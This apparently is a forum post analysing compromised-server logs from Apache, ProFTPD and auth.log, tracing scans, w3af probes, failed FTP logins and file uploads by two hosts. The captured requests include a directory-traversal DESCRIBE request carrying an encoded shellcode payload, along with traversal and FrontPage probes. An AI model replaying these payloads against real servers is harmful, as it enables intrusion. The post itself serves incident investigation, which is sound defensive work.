    10.13.37.10 - - [12/Apr/2010:11:39:00 +0200] "POST /nagios3/cgi-bin/statuswml.cgi HTTP/1.1" 404 339 "-" "-"
    10.13.37.10 - - [12/Apr/2010:11:39:04 +0200] "DESCRIBE /../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../\xcc\xcc\x90\x90%83%e2%1d%3c%40%b8%79%48%91%96%b6%2a%f5%74%4e%90%98%72%30%d5%3b%d6%04%86%fc%42%b4%2d%47%0c%be%9f%46%4b%b1%37%a9%77%11%d1%f9%14%35%b5%bb%27%49%78%43%ba%a8%71%71%08%eb%70%75%7c%7a%7e%7b%24%a9%bb%91%02%e0%1c%4f%98%b0%47%b7%4b%27%79%67%4e%46%38%fe%
c6%c7%c6%c0%e2%74%7d%0b%d4%a8%76%04%b8%99%1d%ba%85%d5%87%d0%e1%31%d6%34%1a%fc%2c%97%48%b1%09%fe%c1%f8%41%37%b6%be%92%b3%9b%15%73%23%f9%7f%4a%9f%78%12%fd%bf%49%b5%90%77%72%40%b4%14%0c%05%35%93%8d%42%32%e3%43%2d%3c%b2%b9%96%66%22%f5%78%33%d2%eb%76%70%67%8d%b9%ba%28%e0%35%0c%93%99%98%74%04%77%66%b1%47%b4%48%b5%73%2c%b2%b8%43%91%79%7c%18%e2%40%a9%be%b6%1c%1b%f5%37%92%9b%9f%34%b7%05%bf%96%b0%2b%d4%4b%97%bb%90%7a%1d%4a%b3%14%81%fd%88%f6%d5%29%e3%46%a8%7e%3c%41%75%7d%01%f9%27%19%e1%71%2d%24%49%4f%72%42%7f%7b%6b%f8%03%fc%15%10%d6%39%f7%e1%73%78%7b%4e%84%d5%7c%79%76%72%70%43%b8%97%15%4e%98%b1%7a%6b%d6%92%75%69%d4%8d%ba%66%a8%3c%47%77%02%eb%71%1c%2c%b5%8c%e0%7d%4f%a9%14%41%48%74%24%04%b4%67%b0%bb%9b%96%2d%b3%b2%be%b6%89%e3%7e%49%35%21%f8%46%37%93%40%0c%7f%4b%91%99%90%29%e2%22%f5%81%fc%bf%4a%1d%9f%05%b9%42%0b%fd%87%f9%b7%34%27%73%37%7b%75%7f%70%11%d6%b2%ba%77%71%10%e1%4a%48%b6%76%79%67%05%2c%9b%47%72%08%eb%74%41%b5%b1%4f%a9%97%24%a8%7a%1d%7e%78%46%04%0c%91%96%18%d4%39%f9%4b%bf%b0%9f%7d%42%b7%43%98%b4%8d%90%35%bb%99%80%f7%e0%27%34%b8%40%2b%fc%b9%66%3c%7c%14%15%88%d2%f8%b3%92%86%d5%49%09%e3%2d%23%d1%e2%1c%33%c6%c0%fd%12%f5%93%4e%be%71%2c%99%93%7c%0c%b6%b0%85%e2%34%b4%40%13%f5%bf%47%a9%b9%8d%03%fe%c1%f8%9b%72%75%3b%d4%4b%1d%b2%4f%7d%74%49%67%9f%04%77%41%73%31%d6%92%97%32%eb%42%7a%14%98%3c%b3%b5%35%38%d0%e0%15%43%76%1b%d3%f9%91%4e%bb%7b%27%a8%96%46%7f%70%05%84%fc%b7%37%66%be%48%1c%7e%24%79%78%01%f6%e3%4a%19%e1%30%fd%2a%eb%72%1a%d5%83%e3%78%73%2d%b8%90%b1%ba%a8%98%3c%92%b0%67%28%d4%9b%4f%40%83%c7%c7%c1%e2%28%f8%0c%4a%47%4e%b4%b9%48%bf%43%7c%66%1d%09%d6%b5%99%42%b6%05%77%35%41%bb%04%49%7f%24%70%7b%11%f6%d5%b1%90%b8%96%75%74%76%2b%fd%b2%9f%31%e1%2c%97%b7%89%f9%86%e0%4b%91%37%46%14%a9%8d%0b%fc%ba%be%7d%34%80%f5%2d%71%1c%93%7a%7e%27%79%7a%79%15%b3%87%d3%eb%66%bf%7c%4a%22%f9%71%6b%d5%88%fc%7d%75%74%46%bb%b1%b3%78%77%34%03%d1%e3%12%e0%2c%18%e2%73%1b%f8%b7%b6%92%be%b5%97%3c%72%14%b9%90%41%1c%37%9b%b2%43%40%49%b8%48%47%8d%91%67%96%42%99%ba%70%7e%7b%05%04%4e%a9%76%0c%4b%b4%b0%32%d4%01%e1%33
%d6%1d%9f%85%fd%93%98%4f%a8%35%27%15%3b%f5%7f%24%2d%7a%7b%73%7e%76%19%eb%29%e1%78%48%b6%4a%b2%99%77%1c%90%98%2a%fc%be%40%05%7f%75%70%23%fe%c6%c0%e0%04%2c%9f%3c%97%0c%7c%10%d4%b9%43%1d%bf%bb%47%37%b0%b3%13%fd%91%b1%93%42%72%49%a9%a8%27%24%9b%92%8d%96%30%f7%e3%4e%71%69%d5%67%8c%e2%2d%74%66%46%34%b7%81%d2%d6%b4%02%f5%35%84%f8%14%21%f9%b5%ba%41%15%7d%4b%b8%4f%79%77%08%f8%76%66%93%43%7f%1a%fc%97%4e%bb%39%d4%7d%0c%7c%73%75%38%d0%e1%34%b6%b5%21%e0%37%74%29%d2%eb%71%04%b8%72%35%91%1d%0b%d6%b9%92%48%4b%05%70%15%b1%b0%90%2b%d5%8d%b7%4f%42%2d%14%78%79%03%fd%67%2c%12%e2%24%32%f5%a9%3c%99%1c%a8%bf%ba%7a%27%41%47%b4%49%84%f9%7b%7e%46%98%96%33%f6%e3%40%b3%b2%74%4a%9b%9f%be%88%eb%75%7b%71%4e%b0%73%79%7c%76%2c%0c%b8%a8%96%3c%1d%02%fc%49%89%d6%7d%48%b6%b4%8c%c0%f9%91%1c%8d%b2%a9%4b%92%93%98%9f%04%99%14%42%7e%46%be%b5%b7%1a%d1%f8%9b%90%37%70%15%ba%97%b1%6b%d4%4f%2d%bf%47%80%fd%35%7a%27%43%b9%23%d5%24%41%22%e1%34%13%f5%7f%05%78%72%66%28%e0%40%bb%b3%08%e3%77%4a%83%e2%67%87%d3%e2%31%eb%43%7c%73%4e%b5%15%92%79%7f%39%f7%e1%74%40%66%b0%a8%09%d0%d4%77%7d%38%d5%19%e0%48%91%14%8d%be%70%78%67%46%b2%27%9f%71%72%7a%7b%42%49%b6%1d%75%76%2d%37%b4%4a%96%98%ba%35%93%1c%24%7e%11%e3%4f%bb%01%f9%0c%4b%1b%d6%9b%47%69%fc%2c%bf%04%86%fd%97%41%a9%b3%90%b1%b8%34%99%b7%05%b9%30%f5%79%7e%72%7a%7f%18%f8%81%eb%10%e0%3c%9f%b5%b0%99%92%90%bf%7b%67%43%b9%2a%e3%3c%49%14%bb%97%2d%76%35%a8%b4%4e%4f%85%d4%15%66%0c%71%78%3b%fe%c7%c6%c1%d1%e1%27%48%be%41%9b%b3%77%75%1d%4a%04%a9%30%f7%d6%b7%ba%33%f6%e2%74%03%f8%7c%13%fc%89%f9%37%98%96%2a%f5%23%d5%b6%70%34%47%05%8d%83%fd%b1%1c%2c%46%91%40%7d%73%4b%93%24%b2%42%b8%79%71%47%74%31%e2%66%1c%9f%b2%b3%a9%4a%b4%38%d3%e0%75%40%1d%72%7f%7e%69%fd%9b%ba%35%2d%87%c7%c0%fe%c6%c1%eb%05%bf%49%b6%7b%4b%b7%18%d5%b1%34%37%27%8d%92%7d%7c%73%42%90%08%fc%41%21%e3%2c%46%4f%14%b5%bb%91%77%76%43%98%a8%97%2b%f9%70%24%85%d2%e1%3c%88%f5%78%4e%7a%48%b9%15%96%04%0c%93%6b%d4%32%d0%e3%67%8c%d6%be%99%80%f8%b0%b8%92%84%eb%46%1c%bb%66%98%81%e1%7e%09%e2%7c%72%2c%b0%42%76%4f%97%b3%9f%27%14%7f%10%fc%78%70%74%1
5%b8%35%7d%0b%d5%96%be%bf%91%b2%a8%7b%01%f8%b4%2d%9b%b9%b6%4a%90%48%79%77%71%3c%40%1b%f9%99%b5%37%67%4b%47%b7%41%93%11%d6%b1%28%fd%0c%1d%02%d4%73%12%f5%8d%75%39%e0%04%49%ba%34%43%a9%7a%4e%24%05%1a%eb%74%7f%66%47%14%40%90%70%79%2c%35%7a%37%b3%19%e3%34%b1%7e%22%e2%46%97%b7%b9%3c%9b%91%b4%73%77%7c%15%27%04%29%d3%d6%9f%bf%4e%41%86%fd%92%43%05%4b%96%2d%0c%99%3b%fc%7b%1c%b8%75%1d%8d%7d%0b%f9%a9%2b%d1%e1%11%f7%c1%e0%49%42%69%d5%bb%b0%78%28%d4%48%71%4a%b5%a8%76%24%be%39%f8%23%f5%93%b2%b6%4f%98%72%67%ba%79%70%12%e0%75%40%2c%7e%77%3b%f9%7a%74%7b%76%1d%85%d4%98%9f%97%b7%66%81%e3%1c%0c%bb%15%4b%b6%87%d6%71%34%86%e1%48%b4%33%d0%d5%b9%47%42%ba%73%37%19%f8%46%b2%9b%67%b0%80%f5%bf%4f%91%7f%49%78%35%a8%99%38%e2%05%14%b1%43%90%84%eb%7c%27%b3%08%fc%04%b8%09%c0%fd%2d%4a%93%a9%96%b5%be%24%3c%7d%72%4e%8d%92%7a%74%77%73%41%a8%92%b7%bf%72%75%48%46%83%e1%24%01%e2%76%6b%fd%66%13%f6%d6%34%8d%43%2a%e0%79%71%78%49%35%7b%14%b1%96%47%b3%21%e3%70%04%7e%67%b5%b6%41%99%9f%97%30%f9%03%fc%4b%02%eb%7d%1d%31%f8%b4%ba%9b%4e%7f%42%7c%40%7e%18%eb%72%05%76%1a%e1%0c%b0%70%1c%90%7d%4f%b9%bb%71%2c%75%27%74%4a%93%7c%32%f5%8c%e2%22%d5%be%a9%77%15%73%1b%d4%7b%37%91%79%3c%b2%7f%2d%98%b8%b8%4a%8d%b2%78%10%d6%b1%a9%e3%1d%b5%bb%27%15%97%96%2d%d2%fd%48%b0%41%89%f8%42%35%4e%49%7a%05%66%b3%0c%43%4b%a8%34%24%40%ba%b4%e0%04%b9%92%14%3c%29%f9%d5%b7%f5%98%4f%46%37%bf%90%b6%91%d4%be%2c%9f%67%1c%99%93%88%fc%47%9b%bb%8d%6c%c1%31%d9%c3%2b%c9%d9%74%24%f4%5a%b1%1a%31%5a%12%83%c2%04%03%d7%62%23%c4%d6%ba%f3%77%48%6b%92%cf%5f%8a%97%b0%ae%4c%77%e1%80%fc%06%cc%a0%cc%36%9e%f0%9e%a0%d2%70%b6%c4%e1%55%4d%b1%06%97%2b%cb%70%70%fa%0b%d2%14%fc%e1%d1%82%ee%45%b4%9f%8f%f1%67%4f%fa%9f%df%a2%7a%0f%8a%66%23%7d%ca%69%9c%95%b2%63%4b%49%6a%f8%e4%fd%5b%9c%9d%93%2a%83%0e%38%7e%13%1f%fb%4d%13%6e%3c%1d%a3%90%71%1e.smi RTSP/1.0" 400 338 "-" "-"
    10.13.37.10 - - [12/Apr/2010:11:39:05 +0200] "GET .Y70'Lil_8U<a-2o3[GCsh94zJ2^wIJf@,ecOw4cVqCk[B3a;ghLP}N=iuLbdzZILQq*)W4,_`5Q>EBiYanx5x0'YoTMH_!Gpp='b_VEUB`bz|uLlXxN6!=o*!(kxR(MCju_!KQL<N5*Wn.|WITT51KxGaps3{pE$\"0h,UCw}E]@lan-OlkGrtC>bfM!Tq;<>J>EiRvi(cWnv9)c8NTrj{oVKcm\"eDijUoF[8I8T[8Mm,hu6P..ro!SnRTMEB;Y\")*S>@a4WDTC}[}b1xM^mT}N5yY$WD,(O[jU[(|8=oOjyb06zdlXLW*yJ>o-G<7U{,9||KL$nqxbH>Eh>]j@(J[wpxcJfzzE8agGU^5)gz[roX1CaFj3eV4[6-1iDkMbfsaiM!]YxSqoyW<!.r=-8il('8!1T.FW}`W(UfY@gZeP[zz*BYP{P=fy54r^@yAazIQ[k\"M]*FMT^v|.Tou!z$CF@@fpiK\")bHsrx<nZvCgH8cD\"Cd5C|{|p`f48s2NK" 400 338 "-" "-"
    10.13.37.10 - - [12/Apr/2010:11:38:55 +0200] "GET / HTTP/1.1" 200 5518 "-" "-"
    
    Suspicious:
    10.13.37.10 - - [12/Apr/2010:11:31:43 +0200] "GET / HTTP/1.1" 200 5518 "-" "w3af.sourceforge.net"
    W3af => web app attack and audit framework to find and exploit web app vulnerabilities

    10.13.37.10 - - [12/Apr/2010:11:38:56 +0200] "GET /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1" 404 339 "-" "-"
    http://www.securiteam.com/windowsntfocus/5JP0L1F4KM.html

    Code:
    /var/log/apache2/error.log
    [Mon Apr 12 11:30:38 2010] [error] [client 10.13.37.10] File does not exist: /var/www/CtFdLwr5.aspx
    [Mon Apr 12 11:30:39 2010] [error] [client 10.13.37.10] script '/var/www/R0nDIs6Q.php' not found or unable to stat
    [Mon Apr 12 11:31:31 2010] [error] [client 10.13.37.10] Unknown Transfer-Encoding: HESLIFIJ
    [Mon Apr 12 11:31:31 2010] [error] [client 10.13.37.10] Unknown Transfer-Encoding: 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
    [Mon Apr 12 11:31:32 2010] [error] [client 10.13.37.10] File does not exist: /var/www/asdfg.hjkl
    [Mon Apr 12 11:31:32 2010] [error] [client 10.13.37.10] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /
    [Mon Apr 12 11:31:32 2010] [error] [client 10.13.37.10] Invalid URI in request HEAD /../../../../../ HTTP/1.0
    [Mon Apr 12 11:31:32 2010] [error] [client 10.13.37.10] request failed: URI too long (longer than 8190)
    /var/log/proftpd/proftpd.log
    Code:
    Apr 09 11:34:07 ServerGroep1 proftpd[3368] ServerGroep1 (Flaptop.lan[::ffff:10.0.0.11]): Maximum login attempts (3) exceeded, connection refused
    Apr 09 11:52:31 ServerGroep1 proftpd[3522] ServerGroep1 (Flaptop.lan[::ffff:10.0.0.11]): notice: unable to use '~/' [resolved to '/var/www/user/ton/']: No such file or directory
    
    Apr 12 11:11:50 ServerGroep1 proftpd[3012] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
    Apr 12 11:11:50 ServerGroep1 proftpd[3012] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
    Apr 12 11:11:57 ServerGroep1 proftpd[3015] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
    Apr 12 11:11:57 ServerGroep1 proftpd[3016] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
    Apr 12 11:11:57 ServerGroep1 proftpd[3016] ServerGroep1 (evil.host[::ffff:10.0.0.14]): no such user 'anonymous'
    Apr 12 11:11:57 ServerGroep1 proftpd[3016] ServerGroep1 (evil.host[::ffff:10.0.0.14]): USER anonymous: no such user found from evil.host [::ffff:10.0.0.14] to ::ffff:10.0.0.13:21
    Apr 12 11:11:57 ServerGroep1 proftpd[3015] ServerGroep1 (evil.host[::ffff:10.0.0.14]): no such user 'anonymous'
    Apr 12 11:11:57 ServerGroep1 proftpd[3015] ServerGroep1 (evil.host[::ffff:10.0.0.14]): USER anonymous: no such user found from evil.host [::ffff:10.0.0.14] to ::ffff:10.0.0.13:21
    Apr 12 11:11:57 ServerGroep1 proftpd[3015] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
    Apr 12 11:12:02 ServerGroep1 proftpd[3016] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
    Apr 12 11:12:26 ServerGroep1 proftpd[3026] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
    Apr 12 11:12:26 ServerGroep1 proftpd[3026] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
    Apr 12 11:12:41 ServerGroep1 proftpd[3029] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
    Apr 12 11:12:41 ServerGroep1 proftpd[3029] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
    Apr 12 11:12:51 ServerGroep1 proftpd[3032] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
    Apr 12 11:12:51 ServerGroep1 proftpd[3034] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
    Apr 12 11:12:51 ServerGroep1 proftpd[3032] ServerGroep1 (evil.host[::ffff:10.0.0.14]): no such user 'anonymous'
    Apr 12 11:12:51 ServerGroep1 proftpd[3032] ServerGroep1 (evil.host[::ffff:10.0.0.14]): USER anonymous: no such user found from evil.host [::ffff:10.0.0.14] to ::ffff:10.0.0.13:21
    Apr 12 11:12:51 ServerGroep1 proftpd[3034] ServerGroep1 (evil.host[::ffff:10.0.0.14]): no such user 'anonymous'
    Apr 12 11:12:51 ServerGroep1 proftpd[3034] ServerGroep1 (evil.host[::ffff:10.0.0.14]): USER anonymous: no such user found from evil.host [::ffff:10.0.0.14] to ::ffff:10.0.0.13:21
    Apr 12 11:12:52 ServerGroep1 proftpd[3034] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
    Apr 12 11:12:56 ServerGroep1 proftpd[3032] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
    Apr 12 11:12:57 ServerGroep1 proftpd[3040] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
    Apr 12 11:12:57 ServerGroep1 proftpd[3040] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
    Apr 12 11:13:10 ServerGroep1 proftpd[3043] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
    Apr 12 11:13:10 ServerGroep1 proftpd[3043] ServerGroep1 (evil.host[::ffff:10.0.0.14]): no such user 'anonymous'
    Apr 12 11:13:10 ServerGroep1 proftpd[3043] ServerGroep1 (evil.host[::ffff:10.0.0.14]): USER anonymous: no such user found from evil.host [::ffff:10.0.0.14] to ::ffff:10.0.0.13:21
    Apr 12 11:13:10 ServerGroep1 proftpd[3043] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
    Apr 12 11:13:10 ServerGroep1 proftpd[3047] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
    Apr 12 11:13:10 ServerGroep1 proftpd[3047] ServerGroep1 (evil.host[::ffff:10.0.0.14]): no such user 'anonymous'
    Apr 12 11:13:10 ServerGroep1 proftpd[3047] ServerGroep1 (evil.host[::ffff:10.0.0.14]): USER anonymous: no such user found from evil.host [::ffff:10.0.0.14] to ::ffff:10.0.0.13:21
    Apr 12 11:13:15 ServerGroep1 proftpd[3047] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
    Apr 12 11:14:54 ServerGroep1 proftpd[3059] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
    Apr 12 11:14:54 ServerGroep1 proftpd[3059] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
    Apr 12 11:15:47 ServerGroep1 proftpd[3063] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
    Apr 12 11:15:47 ServerGroep1 proftpd[3063] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
    Apr 12 11:16:56 ServerGroep1 proftpd[3071] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
    Apr 12 11:16:56 ServerGroep1 proftpd[3071] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
    Apr 12 11:20:10 ServerGroep1 proftpd[3105] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
    Apr 12 11:20:10 ServerGroep1 proftpd[3105] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
    Apr 12 11:20:17 ServerGroep1 proftpd[3107] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
    Apr 12 11:20:17 ServerGroep1 proftpd[3108] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
    Apr 12 11:20:17 ServerGroep1 proftpd[3108] ServerGroep1 (evil.host[::ffff:10.0.0.14]): no such user 'anonymous'
    Apr 12 11:20:17 ServerGroep1 proftpd[3108] ServerGroep1 (evil.host[::ffff:10.0.0.14]): USER anonymous: no such user found from evil.host [::ffff:10.0.0.14] to ::ffff:10.0.0.13:21
    Apr 12 11:20:17 ServerGroep1 proftpd[3107] ServerGroep1 (evil.host[::ffff:10.0.0.14]): no such user 'anonymous'
    Apr 12 11:20:17 ServerGroep1 proftpd[3107] ServerGroep1 (evil.host[::ffff:10.0.0.14]): USER anonymous: no such user found from evil.host [::ffff:10.0.0.14] to ::ffff:10.0.0.13:21
    Apr 12 11:20:18 ServerGroep1 proftpd[3107] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
    Apr 12 11:20:22 ServerGroep1 proftpd[3108] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
    Apr 12 11:25:17 ServerGroep1 proftpd[2886] ServerGroep1: ProFTPD killed (signal 15)
    Apr 12 11:25:17 ServerGroep1 proftpd[2886] ServerGroep1: ProFTPD 1.3.1 standalone mode SHUTDOWN
    Apr 12 11:25:54 ServerGroep1 proftpd[2853] ServerGroep1: ProFTPD 1.3.1 (stable) (built Tue Oct 27 10:09:08 UTC 2009) standalone mode STARTUP
    Apr 12 11:28:20 ServerGroep1 proftpd[2993] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session opened.
    Apr 12 11:28:20 ServerGroep1 proftpd[2993] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session closed.
    Apr 12 11:28:28 ServerGroep1 proftpd[2997] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session opened.
    Apr 12 11:28:28 ServerGroep1 proftpd[2999] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session opened.
    Apr 12 11:28:28 ServerGroep1 proftpd[2999] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): no such user 'anonymous'
    Apr 12 11:28:28 ServerGroep1 proftpd[2999] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): USER anonymous: no such user found from cc4u.lan [::ffff:10.13.37.10] to ::ffff:10.0.0.13:21
    Apr 12 11:28:28 ServerGroep1 proftpd[2997] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): no such user 'anonymous'
    Apr 12 11:28:28 ServerGroep1 proftpd[2997] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): USER anonymous: no such user found from cc4u.lan [::ffff:10.13.37.10] to ::ffff:10.0.0.13:21
    Apr 12 11:28:28 ServerGroep1 proftpd[2997] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session closed.
    Apr 12 11:28:33 ServerGroep1 proftpd[2999] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session closed.
    Apr 12 11:36:46 ServerGroep1 proftpd[3058] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session opened.
    Apr 12 11:36:50 ServerGroep1 proftpd[3058] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): no such user 'DBSNMP'
    Apr 12 11:36:50 ServerGroep1 proftpd[3058] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): USER DBSNMP: no such user found from cc4u.lan [::ffff:10.13.37.10] to ::ffff:10.0.0.13:21
    Apr 12 11:36:50 ServerGroep1 proftpd[3058] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): client sent too-long command, ignoring
    Apr 12 11:36:55 ServerGroep1 proftpd[3061] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session opened.
    Apr 12 11:36:56 ServerGroep1 proftpd[3061] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): client sent too-long command, ignoring
    Apr 12 11:37:21 ServerGroep1 proftpd[3067] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session opened.
    Apr 12 11:37:22 ServerGroep1 proftpd[3067] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): client sent too-long command, ignoring
    Apr 12 11:37:23 ServerGroep1 proftpd[3071] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session opened.
    Apr 12 11:37:42 ServerGroep1 proftpd[3071] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): client sent too-long command, ignoring
    Apr 12 11:37:42 ServerGroep1 proftpd[3077] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session opened.
    Apr 12 11:37:42 ServerGroep1 proftpd[3077] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session closed.
    Apr 12 11:37:46 ServerGroep1 proftpd[3079] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session opened.
    Apr 12 11:37:46 ServerGroep1 proftpd[3079] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): client sent too-long command, ignoring
    Apr 12 11:37:48 ServerGroep1 proftpd[3080] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session opened.
    Apr 12 11:37:49 ServerGroep1 proftpd[3080] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): no such user 'anonymous'
    Apr 12 11:37:49 ServerGroep1 proftpd[3080] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): USER anonymous: no such user found from cc4u.lan [::ffff:10.13.37.10] to ::ffff:10.0.0.13:21
    Apr 12 11:38:03 ServerGroep1 proftpd[3085] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session opened.
    Apr 12 11:38:04 ServerGroep1 proftpd[3085] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): no such user 'anonymous'
    Apr 12 11:38:04 ServerGroep1 proftpd[3085] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): USER anonymous: no such user found from cc4u.lan [::ffff:10.13.37.10] to ::ffff:10.0.0.13:21
    Apr 12 11:38:12 ServerGroep1 proftpd[3087] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session opened.
    Apr 12 11:38:15 ServerGroep1 proftpd[3087] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): no such user 'anonymous'
    Apr 12 11:38:15 ServerGroep1 proftpd[3087] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): USER anonymous: no such user found from cc4u.lan [::ffff:10.13.37.10] to ::ffff:10.0.0.13:21
    Apr 12 11:38:19 ServerGroep1 proftpd[3087] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session closed.
    Apr 12 11:38:23 ServerGroep1 proftpd[3085] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session closed.
    Apr 12 11:38:37 ServerGroep1 proftpd[3080] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): client sent too-long command, ignoring
    
    Apr 12 12:36:38 ServerGroep1 proftpd[3412] ServerGroep1 (cc4u.lan[::ffff:10.10.10.10]): USER leo: Login successful.
    Apr 12 12:36:38 ServerGroep1 proftpd[3412] ServerGroep1 (cc4u.lan[::ffff:10.10.10.10]): Preparing to chroot to directory '/var/www/user/leo'
    Apr 12 12:41:55 ServerGroep1 proftpd[3412] ServerGroep1 (cc4u.lan[::ffff:10.10.10.10]): using sendfile capability for transmitting data
    Apr 12 12:42:11 ServerGroep1 proftpd[3412] ServerGroep1 (cc4u.lan[::ffff:10.10.10.10]): using sendfile capability for transmitting data
    Apr 12 12:43:56 ServerGroep1 proftpd[3412] ServerGroep1 (cc4u.lan[::ffff:10.10.10.10]): FTP session closed.
    
    Several login attempts. Most of them failed, then suddenly they are successful.
    Notable entries:
    evil.host 10.0.0.14
    cc4u.lan 10.13.37.10

    Also:

    Attempt to attack?

    /var/log/proftpd/xferlog
    12 April 12:38:xx - 12:50:xx
    cc4u.lan -> files have been transferred to folder leo

    Bash script has been planted? Or?

    /var/log/syslog
    Several portscans, blocked IPs

    /var/log/wtmp
    http://ubuntuforums.org/archive/index.php/t-886287.html
    I will place the contents of this file tomorrow, but it contains several entries with several ttys (7, 9) and pts/0.

    Auth.log:
    Code:
    Apr 12 11:18:00 ServerGroep1 login[3087]: ROOT LOGIN  on 'tty1'
    Apr 12 11:20:10 ServerGroep1 sshd[3104]: Did not receive identification string from 10.0.0.14
    Apr 12 11:20:17 ServerGroep1 sshd[3106]: Protocol major versions differ for 10.0.0.14: SSH-2.0-OpenSSH_5.1p1 Debian-5 vs. SSH-1.5-Nmap-SSH1-Hostkey
    Apr 12 11:20:18 ServerGroep1 sshd[3109]: Protocol major versions differ for 10.0.0.14: SSH-2.0-OpenSSH_5.1p1 Debian-5 vs. SSH-1.5-NmapNSE_1.0
    Apr 12 11:25:49 ServerGroep1 sshd[2183]: Server listening on :: port 22.
    Apr 12 11:25:49 ServerGroep1 sshd[2183]: Server listening on 0.0.0.0 port 22.
    Apr 12 11:25:55 ServerGroep1 sshd[2183]: Received signal 15; terminating.
    Apr 12 11:25:55 ServerGroep1 sshd[2982]: Server listening on :: port 22.
    Apr 12 11:25:55 ServerGroep1 sshd[2982]: Server listening on 0.0.0.0 port 22.
    Apr 12 11:28:21 ServerGroep1 sshd[2992]: Did not receive identification string from 10.13.37.10
